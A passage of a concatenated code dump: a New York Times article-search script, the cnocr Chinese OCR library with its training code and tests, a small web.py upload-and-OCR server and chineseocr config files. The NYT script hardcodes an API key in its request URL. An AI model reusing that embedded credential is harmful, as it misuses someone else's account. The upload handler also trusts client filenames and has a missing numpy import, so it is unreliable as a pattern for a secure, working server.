docs.append(Document(itemIdList, itemCountList, wordCount))
return docs, word2id, id2word
def maxItemNum(N, docs):
num = 0
for d in range(0, N):
if len(docs[d].itemIdList) > num:
num = len(docs[d].itemIdList)
return num
--- FILE SEPARATOR ---
# Dependencies
import requests
import time
from pprint import pprint
def retrieve_articles(query):
url = "https://api.nytimes.com/svc/search/v2/articlesearch.json?"
# Store a search term
#query = "groups may white reform immigration federation american trump including nation"
#fq = "money"
# Search for articles published between a begin and end date
begin_date = "20190101"
end_date = "20190818"
#filter
query_url = f"{url}api-key=db1Vnm2AtlDDvNGJwu5izccRSafP0DGl&q={query}&begin_date={begin_date}&end_date={end_date}"
# Empty list for articles
articles_list = []
ignore_terms =["marriage","wedding","pregnancy",'adventure']
# loop through pages for more results.
for page in range(0, 4):
query_url = f"{url}api-key=db1Vnm2AtlDDvNGJwu5izccRSafP0DGl&q={query}&begin_date={begin_date}&end_date={end_date}"
# create query with page number
query_url = f"{query_url}&page={str(page)}"
articles = requests.get(query_url).json()
# Add a one second interval between queries to stay within API query limits
time.sleep(1)
# loop through the response and append each article to the list
for article in articles["response"]["docs"]:
x = f'{article["snippet"]} {article["web_url"]}'
articles_list.append(x)
#get rid of terms in articles irrelevant to what you are searching.
for element in ignore_terms:
if element in x:
articles_list.pop()
string_articles_list = ''
for x,y in enumerate(articles_list):
print(f'{x+1}. {y} \n')
string_articles_list += f'{x+1}. {y} \n'
return string_articles_list
'''
# Retrieve articles
articles = requests.get(query_url).json()
articles_list = [article for article in articles["response"]["docs"]]
#print(articles_list)
for article in articles_list:
print(f'{article["snippet"]} {article["web_url"]} \n')
'''
|
[
"/keyword_extractor.py",
"/news_api.py",
"/preprocessing.py",
"/retrieve_articles.py"
] |
0000005/kiftd-source
|
from .cn_ocr import CnOcr
--- FILE SEPARATOR ---
# coding: utf-8
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import os
import mxnet as mx
import numpy as np
from PIL import Image
from cnocr.__version__ import __version__
from cnocr.consts import MODEL_EPOCE
from cnocr.hyperparams.cn_hyperparams import CnHyperparams as Hyperparams
from cnocr.fit.lstm import init_states
from cnocr.fit.ctc_metrics import CtcMetrics
from cnocr.data_utils.data_iter import SimpleBatch
from cnocr.symbols.crnn import crnn_lstm
from cnocr.utils import data_dir, get_model_file, read_charset, normalize_img_array
from cnocr.line_split import line_split
def read_ocr_img(path):
"""
:param path: image file path
:return: gray image, with dim [height, width, 1], with values range from 0 to 255
"""
# img = Image.open(path).resize((hp.img_width, hp.img_height), Image.BILINEAR)
# img = img.convert('L')
# img = np.expand_dims(np.array(img), 0)
# return img
return mx.image.imread(path, 0)
def rescale_img(img, hp):
"""
:param img: np.ndarray or mx.ndarray; should be gray image, with dim [height, width] or [height, width, 1]
:param hp: instance of Hyperparams
:return: np.ndarray with the given width and height from hp. The resulting dim is [1, height, width]
"""
if isinstance(img, np.ndarray):
img = mx.nd.array(img)
scale = hp.img_height / img.shape[0]
new_width = int(scale * img.shape[1])
hp._seq_length = new_width // 8
if len(img.shape) == 2: # mx.image.imresize needs the third dim
img = mx.nd.expand_dims(img, 2)
img = mx.image.imresize(img, w=new_width, h=hp.img_height).asnumpy()
img = np.squeeze(img, axis=2)
return np.expand_dims(img, 0)
def lstm_init_states(batch_size, hp):
""" Returns a tuple of names and zero arrays for LSTM init states"""
init_shapes = init_states(batch_size=batch_size, num_lstm_layer=hp.num_lstm_layer, num_hidden=hp.num_hidden)
init_names = [s[0] for s in init_shapes]
init_arrays = [mx.nd.zeros(x[1]) for x in init_shapes]
# init_names.append('seq_length')
# init_arrays.append(hp.seq_length)
return init_names, init_arrays
def load_module(prefix, epoch, data_names, data_shapes, network=None):
"""
Loads the model from checkpoint specified by prefix and epoch, binds it
to an executor, and sets its parameters and returns a mx.mod.Module
"""
sym, arg_params, aux_params = mx.model.load_checkpoint(prefix, epoch)
if network is not None:
sym = network
# We don't need CTC loss for prediction, just a simple softmax will suffice.
# We get the output of the layer just before the loss layer ('pred_fc') and add softmax on top
pred_fc = sym.get_internals()['pred_fc_output']
sym = mx.sym.softmax(data=pred_fc)
mod = mx.mod.Module(symbol=sym, context=mx.cpu(), data_names=data_names, label_names=None)
mod.bind(for_training=False, data_shapes=data_shapes)
mod.set_params(arg_params, aux_params, allow_missing=False)
return mod
class CnOcr(object):
MODEL_FILE_PREFIX = 'model-v{}'.format(__version__)
def __init__(self, root=data_dir(), model_epoch=MODEL_EPOCE):
self._model_dir = os.path.join(root, 'models')
self._model_epoch = model_epoch
self._assert_and_prepare_model_files(root)
self._alphabet, _ = read_charset(os.path.join(self._model_dir, 'label_cn.txt'))
self._hp = Hyperparams()
self._hp._loss_type = None # infer mode
self._mod = self._get_module(self._hp)
def _assert_and_prepare_model_files(self, root):
model_dir = self._model_dir
model_files = ['label_cn.txt',
'%s-%04d.params' % (self.MODEL_FILE_PREFIX, self._model_epoch),
'%s-symbol.json' % self.MODEL_FILE_PREFIX]
file_prepared = True
for f in model_files:
f = os.path.join(model_dir, f)
if not os.path.exists(f):
file_prepared = False
break
if file_prepared:
return
if os.path.exists(model_dir):
os.removedirs(model_dir)
get_model_file(root)
def _get_module(self, hp):
network = crnn_lstm(hp)
prefix = os.path.join(self._model_dir, self.MODEL_FILE_PREFIX)
# import pdb; pdb.set_trace()
data_names = ['data']
data_shapes = [(data_names[0], (hp.batch_size, 1, hp.img_height, hp.img_width))]
mod = load_module(prefix, self._model_epoch, data_names, data_shapes, network=network)
return mod
def ocr(self, img_fp):
"""
:param img_fp: image file path; or color image mx.nd.NDArray or np.ndarray,
with shape (height, width, 3), and the channels should be RGB formatted.
:return: List(List(Char)), such as:
[['第', '一', '行'], ['第', '二', '行'], ['第', '三', '行']]
"""
if isinstance(img_fp, str) and os.path.isfile(img_fp):
img = mx.image.imread(img_fp, 1).asnumpy()
elif isinstance(img_fp, mx.nd.NDArray):
img = img_fp.asnumpy()
elif isinstance(img_fp, np.ndarray):
img = img_fp
else:
raise TypeError('Inappropriate argument type.')
if min(img.shape[0], img.shape[1]) < 2:
return ''
line_imgs = line_split(img, blank=True)
line_img_list = [line_img for line_img, _ in line_imgs]
line_chars_list = self.ocr_for_single_lines(line_img_list)
return line_chars_list
def ocr_for_single_line(self, img_fp):
"""
Recognize characters from an image with only one-line characters.
:param img_fp: image file path; or image mx.nd.NDArray or np.ndarray,
with shape [height, width] or [height, width, channel].
The optional channel should be 1 (gray image) or 3 (color image).
:return: character list, such as ['你', '好']
"""
if isinstance(img_fp, str) and os.path.isfile(img_fp):
img = read_ocr_img(img_fp)
elif isinstance(img_fp, mx.nd.NDArray) or isinstance(img_fp, np.ndarray):
img = img_fp
else:
raise TypeError('Inappropriate argument type.')
res = self.ocr_for_single_lines([img])
return res[0]
def ocr_for_single_lines(self, img_list):
"""
Batch recognize characters from a list of one-line-characters images.
:param img_list: list of images, in which each element should be a line image array,
with type mx.nd.NDArray or np.ndarray.
Each element should be a tensor with values ranging from 0 to 255,
and with shape [height, width] or [height, width, channel].
The optional channel should be 1 (gray image) or 3 (color image).
:return: list of list of chars, such as
[['第', '一', '行'], ['第', '二', '行'], ['第', '三', '行']]
"""
if len(img_list) == 0:
return []
img_list = [self._preprocess_img_array(img) for img in img_list]
batch_size = len(img_list)
img_list, img_widths = self._pad_arrays(img_list)
# import pdb; pdb.set_trace()
sample = SimpleBatch(
data_names=['data'],
data=[mx.nd.array(img_list)])
prob = self._predict(sample)
prob = np.reshape(prob, (-1, batch_size, prob.shape[1])) # [seq_len, batch_size, num_classes]
max_width = max(img_widths)
res = []
for i in range(batch_size):
res.append(self._gen_line_pred_chars(prob[:, i, :], img_widths[i], max_width))
return res
def _preprocess_img_array(self, img):
"""
:param img: image array with type mx.nd.NDArray or np.ndarray,
with shape [height, width] or [height, width, channel].
channel shoule be 1 (gray image) or 3 (color image).
:return: np.ndarray, with shape (1, height, width)
"""
if len(img.shape) == 3 and img.shape[2] == 3:
if isinstance(img, mx.nd.NDArray):
img = img.asnumpy()
if img.dtype != np.dtype('uint8'):
img = img.astype('uint8')
# color to gray
img = np.array(Image.fromarray(img).convert('L'))
img = rescale_img(img, self._hp)
return normalize_img_array(img)
def _pad_arrays(self, img_list):
"""Padding to make sure all the elements have the same width."""
img_widths = [img.shape[2] for img in img_list]
if len(img_list) <= 1:
return img_list, img_widths
max_width = max(img_widths)
pad_width = [(0, 0), (0, 0), (0, 0)]
padded_img_list = []
for img in img_list:
if img.shape[2] < max_width:
pad_width[2] = (0, max_width - img.shape[2])
img = np.pad(img, pad_width, 'constant', constant_values=0.0)
padded_img_list.append(img)
return padded_img_list, img_widths
def _predict(self, sample):
mod = self._mod
mod.forward(sample)
prob = mod.get_outputs()[0].asnumpy()
return prob
def _gen_line_pred_chars(self, line_prob, img_width, max_img_width):
"""
Get the predicted characters.
:param line_prob: with shape of [seq_length, num_classes]
:param img_width:
:param max_img_width:
:return:
"""
class_ids = np.argmax(line_prob, axis=-1)
# idxs = list(zip(range(len(class_ids)), class_ids))
# probs = [line_prob[e[0], e[1]] for e in idxs]
if img_width < max_img_width:
comp_ratio = self._hp.seq_len_cmpr_ratio
end_idx = img_width // comp_ratio
if end_idx < len(class_ids):
class_ids[end_idx:] = 0
prediction, start_end_idx = CtcMetrics.ctc_label(class_ids.tolist())
# print(start_end_idx)
alphabet = self._alphabet
res = [alphabet[p] for p in prediction]
# res = self._insert_space_char(res, start_end_idx)
return res
def _insert_space_char(self, pred_chars, start_end_idx, min_interval=None):
if len(pred_chars) < 2:
return pred_chars
assert len(pred_chars) == len(start_end_idx)
if min_interval is None:
# 自动计算最小区间值
intervals = {start_end_idx[idx][0] - start_end_idx[idx-1][1] for idx in range(1, len(start_end_idx))}
if len(intervals) >= 3:
intervals = sorted(list(intervals))
if intervals[0] < 1: # 排除间距为0的情况
intervals = intervals[1:]
min_interval = intervals[2]
else:
min_interval = start_end_idx[-1][1] # no space will be inserted
res_chars = [pred_chars[0]]
for idx in range(1, len(pred_chars)):
if start_end_idx[idx][0] - start_end_idx[idx-1][1] >= min_interval:
res_chars.append(' ')
res_chars.append(pred_chars[idx])
return res_chars
--- FILE SEPARATOR ---
from .__version__ import __version__
MODEL_BASE_URL = 'https://www.dropbox.com/s/7w8l3mk4pvkt34w/cnocr-models-v1.0.0.zip?dl=1'
MODEL_EPOCE = 20
ZIP_FILE_NAME = 'cnocr-models-v{}.zip'.format(__version__)
--- FILE SEPARATOR ---
import logging
import os
import mxnet as mx
def _load_model(args):
if 'load_epoch' not in args or args.load_epoch is None:
return None, None, None
assert args.prefix is not None
model_prefix = args.prefix
sym, arg_params, aux_params = mx.model.load_checkpoint(
model_prefix, args.load_epoch)
logging.info('Loaded model %s-%04d.params', model_prefix, args.load_epoch)
return sym, arg_params, aux_params
def fit(network, data_train, data_val, metrics, args, hp, data_names=None):
if args.gpu:
contexts = [mx.context.gpu(i) for i in range(args.gpu)]
else:
contexts = [mx.context.cpu(i) for i in range(args.cpu)]
sym, arg_params, aux_params = _load_model(args)
if sym is not None:
assert sym.tojson() == network.tojson()
if not os.path.exists(os.path.dirname(args.prefix)):
os.makedirs(os.path.dirname(args.prefix))
module = mx.mod.Module(
symbol=network,
data_names=["data"] if data_names is None else data_names,
label_names=['label'],
context=contexts)
# from mxnet import nd
# import numpy as np
# data = nd.random.uniform(shape=(128, 1, 32, 100))
# label = np.random.randint(1, 11, size=(128, 4))
# module.bind(data_shapes=[('data', (128, 1, 32, 100))], label_shapes=[('label', (128, 4))])
# # e = module.bind()
# # f = e.forward(is_train=False)
# module.init_params(mx.init.Xavier(factor_type="in", magnitude=2.34))
# from ..data_utils.data_iter import SimpleBatch
# data_all = [data]
# label_all = [mx.nd.array(label)]
# # print(label_all[0])
# # data_names = ['data'] + init_state_names
# data_names = ['data']
# label_names = ['label']
#
# data_batch = SimpleBatch(data_names, data_all, label_names, label_all)
# module.forward(data_batch)
# f = module.get_outputs()
# import pdb; pdb.set_trace()
begin_epoch = args.load_epoch if args.load_epoch else 0
num_epoch = hp.num_epoch + begin_epoch
module.fit(train_data=data_train,
eval_data=data_val,
begin_epoch=begin_epoch,
num_epoch=num_epoch,
# use metrics.accuracy or metrics.accuracy_lcs
eval_metric=mx.metric.np(metrics.accuracy, allow_extra_outputs=True),
optimizer='AdaDelta',
optimizer_params={'learning_rate': hp.learning_rate,
# 'momentum': hp.momentum,
'wd': 0.00001,
},
initializer=mx.init.Xavier(factor_type="in", magnitude=2.34),
arg_params=arg_params,
aux_params=aux_params,
batch_end_callback=mx.callback.Speedometer(hp.batch_size, 50),
epoch_end_callback=mx.callback.do_checkpoint(args.prefix),
)
--- FILE SEPARATOR ---
# coding: utf-8
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import os
import platform
import zipfile
import numpy as np
from mxnet.gluon.utils import download
from .consts import MODEL_BASE_URL, ZIP_FILE_NAME
def data_dir_default():
"""
:return: default data directory depending on the platform and environment variables
"""
system = platform.system()
if system == 'Windows':
return os.path.join(os.environ.get('APPDATA'), 'cnocr')
else:
return os.path.join(os.path.expanduser("~"), '.cnocr')
def data_dir():
"""
:return: data directory in the filesystem for storage, for example when downloading models
"""
return os.getenv('CNOCR_HOME', data_dir_default())
def get_model_file(root=data_dir()):
r"""Return location for the downloaded models on local file system.
This function will download from online model zoo when model cannot be found or has mismatch.
The root directory will be created if it doesn't exist.
Parameters
----------
root : str, default $CNOCR_HOME
Location for keeping the model parameters.
Returns
-------
file_path
Path to the requested pretrained model file.
"""
root = os.path.expanduser(root)
os.makedirs(root, exist_ok=True)
zip_file_path = os.path.join(root, ZIP_FILE_NAME)
if not os.path.exists(zip_file_path):
download(MODEL_BASE_URL, path=zip_file_path, overwrite=True)
with zipfile.ZipFile(zip_file_path) as zf:
zf.extractall(root)
os.remove(zip_file_path)
return os.path.join(root, 'models')
def read_charset(charset_fp):
alphabet = [None]
# 第0个元素是预留id,在CTC中用来分割字符。它不对应有意义的字符
with open(charset_fp, encoding='utf-8') as fp:
for line in fp:
alphabet.append(line.rstrip('\n'))
# print('Alphabet size: %d' % len(alphabet))
inv_alph_dict = {_char: idx for idx, _char in enumerate(alphabet)}
# inv_alph_dict[' '] = inv_alph_dict['<space>'] # 对应空格
return alphabet, inv_alph_dict
def normalize_img_array(img):
""" rescale to [-1.0, 1.0] """
# return (img / 255.0 - 0.5) * 2
return (img - np.mean(img)) / (np.std(img) + 1e-6)
--- FILE SEPARATOR ---
# coding: utf-8
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from __future__ import print_function
import argparse
import logging
import os
import sys
sys.path.insert(0, os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
from cnocr.__version__ import __version__
from cnocr.utils import data_dir
from cnocr.hyperparams.cn_hyperparams import CnHyperparams as Hyperparams
from cnocr.hyperparams.hyperparams2 import Hyperparams as Hyperparams2
from cnocr.data_utils.data_iter import ImageIterLstm, MPOcrImages, OCRIter
from cnocr.symbols.crnn import crnn_no_lstm, crnn_lstm
from cnocr.fit.ctc_metrics import CtcMetrics
from cnocr.fit.fit import fit
def parse_args():
# Parse command line arguments
parser = argparse.ArgumentParser()
default_model_prefix = os.path.join(data_dir(), 'models', 'model-v{}'.format(__version__))
parser.add_argument("--dataset",
help="use which kind of dataset, captcha or cn_ocr",
choices=['captcha', 'cn_ocr'],
type=str, default='captcha')
parser.add_argument("--data_root", help="Path to image files", type=str,
default='/Users/king/Documents/WhatIHaveDone/Test/text_renderer/output/wechat_simulator')
parser.add_argument("--train_file", help="Path to train txt file", type=str,
default='/Users/king/Documents/WhatIHaveDone/Test/text_renderer/output/wechat_simulator/train.txt')
parser.add_argument("--test_file", help="Path to test txt file", type=str,
default='/Users/king/Documents/WhatIHaveDone/Test/text_renderer/output/wechat_simulator/test.txt')
parser.add_argument("--cpu",
help="Number of CPUs for training [Default 8]. Ignored if --gpu is specified.",
type=int, default=2)
parser.add_argument("--gpu", help="Number of GPUs for training [Default 0]", type=int)
parser.add_argument('--load_epoch', type=int,
help='load the model on an epoch using the model-load-prefix [Default: no trained model will be loaded]')
parser.add_argument("--prefix", help="Checkpoint prefix [Default '{}']".format(default_model_prefix),
default=default_model_prefix)
parser.add_argument("--loss", help="'ctc' or 'warpctc' loss [Default 'ctc']", default='ctc')
parser.add_argument("--num_proc", help="Number CAPTCHA generating processes [Default 4]", type=int, default=4)
parser.add_argument("--font_path", help="Path to ttf font file or directory containing ttf files")
return parser.parse_args()
def get_fonts(path):
fonts = list()
if os.path.isdir(path):
for filename in os.listdir(path):
if filename.endswith('.ttf') or filename.endswith('.ttc'):
fonts.append(os.path.join(path, filename))
else:
fonts.append(path)
return fonts
def run_captcha(args):
from cnocr.data_utils.captcha_generator import MPDigitCaptcha
hp = Hyperparams2()
network = crnn_lstm(hp)
# arg_shape, out_shape, aux_shape = network.infer_shape(data=(128, 1, 32, 100), label=(128, 10),
# l0_init_h=(128, 100), l1_init_h=(128, 100), l2_init_h=(128, 100), l3_init_h=(128, 100))
# print(dict(zip(network.list_arguments(), arg_shape)))
# import pdb; pdb.set_trace()
# Start a multiprocessor captcha image generator
mp_captcha = MPDigitCaptcha(
font_paths=get_fonts(args.font_path), h=hp.img_width, w=hp.img_height,
num_digit_min=3, num_digit_max=4, num_processes=args.num_proc, max_queue_size=hp.batch_size * 2)
mp_captcha.start()
# img, num = mp_captcha.get()
# print(img.shape, num)
# import numpy as np
# import cv2
# img = np.transpose(img, (1, 0))
# cv2.imwrite('captcha1.png', img * 255)
# import sys
# sys.exit(0)
# import pdb; pdb.set_trace()
# init_c = [('l%d_init_c' % l, (hp.batch_size, hp.num_hidden)) for l in range(hp.num_lstm_layer * 2)]
# init_h = [('l%d_init_h' % l, (hp.batch_size, hp.num_hidden)) for l in range(hp.num_lstm_layer * 2)]
# init_states = init_c + init_h
# data_names = ['data'] + [x[0] for x in init_states]
data_names = ['data']
data_train = OCRIter(
hp.train_epoch_size // hp.batch_size, hp.batch_size, captcha=mp_captcha, num_label=hp.num_label,
name='train')
data_val = OCRIter(
hp.eval_epoch_size // hp.batch_size, hp.batch_size, captcha=mp_captcha, num_label=hp.num_label,
name='val')
head = '%(asctime)-15s %(message)s'
logging.basicConfig(level=logging.DEBUG, format=head)
metrics = CtcMetrics(hp.seq_length)
fit(network=network, data_train=data_train, data_val=data_val, metrics=metrics, args=args, hp=hp, data_names=data_names)
mp_captcha.reset()
def run_cn_ocr(args):
hp = Hyperparams()
network = crnn_lstm(hp)
mp_data_train = MPOcrImages(args.data_root, args.train_file, (hp.img_width, hp.img_height), hp.num_label,
num_processes=args.num_proc, max_queue_size=hp.batch_size * 100)
# img, num = mp_data_train.get()
# print(img.shape)
# print(mp_data_train.shape)
# import pdb; pdb.set_trace()
# import numpy as np
# import cv2
# img = np.transpose(img, (1, 0))
# cv2.imwrite('captcha1.png', img * 255)
# import pdb; pdb.set_trace()
mp_data_test = MPOcrImages(args.data_root, args.test_file, (hp.img_width, hp.img_height), hp.num_label,
num_processes=max(args.num_proc // 2, 1), max_queue_size=hp.batch_size * 10)
mp_data_train.start()
mp_data_test.start()
# init_c = [('l%d_init_c' % l, (hp.batch_size, hp.num_hidden)) for l in range(hp.num_lstm_layer * 2)]
# init_h = [('l%d_init_h' % l, (hp.batch_size, hp.num_hidden)) for l in range(hp.num_lstm_layer * 2)]
# init_states = init_c + init_h
# data_names = ['data'] + [x[0] for x in init_states]
data_names = ['data']
data_train = OCRIter(
hp.train_epoch_size // hp.batch_size, hp.batch_size, captcha=mp_data_train, num_label=hp.num_label,
name='train')
data_val = OCRIter(
hp.eval_epoch_size // hp.batch_size, hp.batch_size, captcha=mp_data_test, num_label=hp.num_label,
name='val')
# data_train = ImageIterLstm(
# args.data_root, args.train_file, hp.batch_size, (hp.img_width, hp.img_height), hp.num_label, init_states, name="train")
# data_val = ImageIterLstm(
# args.data_root, args.test_file, hp.batch_size, (hp.img_width, hp.img_height), hp.num_label, init_states, name="val")
head = '%(asctime)-15s %(message)s'
logging.basicConfig(level=logging.DEBUG, format=head)
metrics = CtcMetrics(hp.seq_length)
fit(network=network, data_train=data_train, data_val=data_val, metrics=metrics, args=args, hp=hp, data_names=data_names)
mp_data_train.reset()
mp_data_test.reset()
if __name__ == '__main__':
args = parse_args()
if args.dataset == 'captcha':
run_captcha(args)
else:
run_cn_ocr(args)
--- FILE SEPARATOR ---
# coding: utf-8
import os
import sys
import pytest
import numpy as np
import mxnet as mx
from mxnet import nd
from PIL import Image
sys.path.insert(0, os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
sys.path.insert(1, os.path.dirname(os.path.abspath(__file__)))
from cnocr import CnOcr
from cnocr.line_split import line_split
CNOCR = CnOcr()
SINGLE_LINE_CASES = [
('20457890_2399557098.jpg', [['就', '会', '哈', '哈', '大', '笑', '。', '3', '.', '0']]),
('rand_cn1.png', [['笠', '淡', '嘿', '骅', '谧', '鼎', '臭', '姚', '歼', '蠢', '驼', '耳', '裔', '挝', '涯', '狗', '蒽', '子', '犷']])
]
MULTIPLE_LINE_CASES = [
('multi-line_cn1.png', [['网', '络', '支', '付', '并', '无', '本', '质', '的', '区', '别', ',', '因', '为'],
['每', '一', '个', '手', '机', '号', '码', '和', '邮', '件', '地', '址', '背', '后'],
['都', '会', '对', '应', '着', '一', '个', '账', '户', '一', '―', '这', '个', '账'],
['户', '可', '以', '是', '信', '用', '卡', '账', '户', '、', '借', '记', '卡', '账'],
['户', ',', '也', '包', '括', '邮', '局', '汇', '款', '、', '手', '机', '代'],
['收', '、', '电', '话', '代', '收', '、', '预', '付', '费', '卡', '和', '点', '卡'],
['等', '多', '种', '形', '式', '。']]),
('multi-line_cn2.png', [['。', '当', '然', ',', '在', '媒', '介', '越', '来', '越', '多', '的', '情', '形', '下', ','],
['意', '味', '着', '传', '播', '方', '式', '的', '变', '化', '。', '过', '去', '主', '流'],
['的', '是', '大', '众', '传', '播', ',', '现', '在', '互', '动', '性', '和', '定', '制'],
['性', '带', '来', '了', '新', '的', '挑', '战', '—', '—', '如', '何', '让', '品', '牌'],
['与', '消', '费', '者', '更', '加', '互', '动', '。']]),
]
CASES = SINGLE_LINE_CASES + MULTIPLE_LINE_CASES
@pytest.mark.parametrize('img_fp, expected', CASES)
def test_ocr(img_fp, expected):
ocr = CNOCR
root_dir = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
img_fp = os.path.join(root_dir, 'examples', img_fp)
pred = ocr.ocr(img_fp)
print('\n')
print("Predicted Chars:", pred)
assert expected == pred
img = mx.image.imread(img_fp, 1)
pred = ocr.ocr(img)
print("Predicted Chars:", pred)
assert expected == pred
img = mx.image.imread(img_fp, 1).asnumpy()
pred = ocr.ocr(img)
print("Predicted Chars:", pred)
assert expected == pred
@pytest.mark.parametrize('img_fp, expected', SINGLE_LINE_CASES)
def test_ocr_for_single_line(img_fp, expected):
ocr = CNOCR
root_dir = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
img_fp = os.path.join(root_dir, 'examples', img_fp)
pred = ocr.ocr_for_single_line(img_fp)
print('\n')
print("Predicted Chars:", pred)
assert expected[0] == pred
img = mx.image.imread(img_fp, 1)
pred = ocr.ocr_for_single_line(img)
print("Predicted Chars:", pred)
assert expected[0] == pred
img = mx.image.imread(img_fp, 1).asnumpy()
pred = ocr.ocr_for_single_line(img)
print("Predicted Chars:", pred)
assert expected[0] == pred
img = np.array(Image.fromarray(img).convert('L'))
assert len(img.shape) == 2
pred = ocr.ocr_for_single_line(img)
print("Predicted Chars:", pred)
assert expected[0] == pred
img = np.expand_dims(img, axis=2)
assert len(img.shape) == 3 and img.shape[2] == 1
pred = ocr.ocr_for_single_line(img)
print("Predicted Chars:", pred)
assert expected[0] == pred
@pytest.mark.parametrize('img_fp, expected', MULTIPLE_LINE_CASES)
def test_ocr_for_single_lines(img_fp, expected):
ocr = CNOCR
root_dir = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
img_fp = os.path.join(root_dir, 'examples', img_fp)
img = mx.image.imread(img_fp, 1).asnumpy()
line_imgs = line_split(img, blank=True)
line_img_list = [line_img for line_img, _ in line_imgs]
pred = ocr.ocr_for_single_lines(line_img_list)
print('\n')
print("Predicted Chars:", pred)
assert expected == pred
line_img_list = [nd.array(line_img) for line_img in line_img_list]
pred = ocr.ocr_for_single_lines(line_img_list)
print("Predicted Chars:", pred)
assert expected == pred
--- FILE SEPARATOR ---
# coding: utf-8
import os
import sys
import mxnet as mx
import numpy as np
from mxnet import nd
import pytest
sys.path.insert(0, os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
sys.path.insert(1, os.path.dirname(os.path.abspath(__file__)))
def test_nd():
ele = np.reshape(np.array(range(2*3)), (2, 3))
data = [ele, ele + 10]
new = nd.array([ele])
assert new.shape == (1, 2, 3)
new = nd.array(data)
assert new.shape == (2, 2, 3)
print(new)
--- FILE SEPARATOR ---
import web
import json
from cnocr import CnOcr
import gc
urls = ('/upload', 'Upload')
class Upload:
def GET(self):
return """<html><head></head><body>
<form method="POST" enctype="multipart/form-data" action="">
<input type="file" name="myfile" />
<br/>
<input type="submit" />
</form>
</body></html>"""
def POST(self):
x = web.input(myfile={})
filedir = './upload_file' # change this to the directory you want to store the file in.
if 'myfile' in x: # to check if the file-object is created
filepath=x.myfile.filename.replace('\\','/') # replaces the windows-style slashes with linux ones.
filename=filepath.split('/')[-1] # splits the and chooses the last part (the filename with extension)
fout = open(filedir +'/'+ filename,'wb') # creates the file where the uploaded file should be stored
fout.write(x.myfile.file.read()) # writes the uploaded file to the newly created file.
fout.close() # closes the file, upload complete.
myOcr = CnOcr()
resultData = myOcr.ocr( filedir + '/' + filename )
del myOcr
gc.collect()
jsonStr=json.dumps(resultData, cls=NumpyEncoder)
return jsonStr;
if __name__ == "__main__":
app = web.application(urls, globals())
app.run()
class NumpyEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, (np.int_, np.intc, np.intp, np.int8,
np.int16, np.int32, np.int64, np.uint8,
np.uint16, np.uint32, np.uint64)):
return int(obj)
elif isinstance(obj, (np.float_, np.float16, np.float32,
np.float64)):
return float(obj)
elif isinstance(obj,(np.ndarray,)): #### This is the fix
return obj.tolist()
return json.JSONEncoder.default(self, obj)
--- FILE SEPARATOR ---
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
config
@author: chineseocr
"""
ocrPath = 'models/ocr.weights'
textPath = 'models/text.weights'
darkRoot ='../darknet/libdarknet.so' ##darknet
TEXT_LINE_SCORE=0.85##text line prob
scale = 600##可动态修改 no care text.cfg height,width
maxScale = 900
GPU=False ## gpu for darknet or cpu for opencv.dnn
anchors = '16,11, 16,16, 16,23, 16,33, 16,48, 16,68, 16,97, 16,139, 16,198, 16,283'
--- FILE SEPARATOR ---
import cv2
import time
import numpy as np
from PIL import Image
from keys import characters
from config import ocrPath,GPU
charactersPred = ' '+characters+' '
if GPU:
pass
else:
net = cv2.dnn.readNetFromDarknet(ocrPath.replace('weights','cfg'),ocrPath)
def predict_cpu(image):
"""
cnn ctc model
"""
scale = image.size[1]*1.0 / 32
w = image.size[0] / scale
w = int(w)
image = image.resize((w,32),Image.BILINEAR)
image = (np.array(image.convert('L'))/255.0-0.5)/0.5
image = np.array([[image]])
net.setInput(image)
y_pred = net.forward(net.getUnconnectedOutLayersNames())
y_pred = y_pred[0][0,:,-1,:]
out = decode(y_pred)##
return out
def decode(pred):
t = pred.argmax(axis=0)
length = len(t)
char_list = []
n = len(charactersPred)
for i in range(length):
if t[i] not in [n-1,n-2] and (not (i > 0 and t[i - 1] == t[i])):
char_list.append(charactersPred[t[i]])
return ''.join(char_list)
if __name__=='__main__':
t =time.time()
img=Image.open('./13.jpg')
res = predict(img)
print(time.time()-t,res)
--- FILE SEPARATOR ---
# -*- coding: utf-8 -*-
"""
@author: chineseocr
"""
import web
web.config.debug = False
import uuid
import json
import os
import sys
import time
import cv2
import numpy as np
from helper.image import read_url_img,base64_to_PIL,get_now
from PIL import Image
from dnn.text import detect_lines
from config import scale,maxScale,TEXT_LINE_SCORE
import json
render = web.template.render('templates', base='base')
billList =[]
root = './test/'
timeOutTime=5
def job(imgPath):
img = Image.open(imgPath)
if img is not None:
image = np.array(img)
image = cv2.cvtColor(image, cv2.COLOR_RGB2BGR)
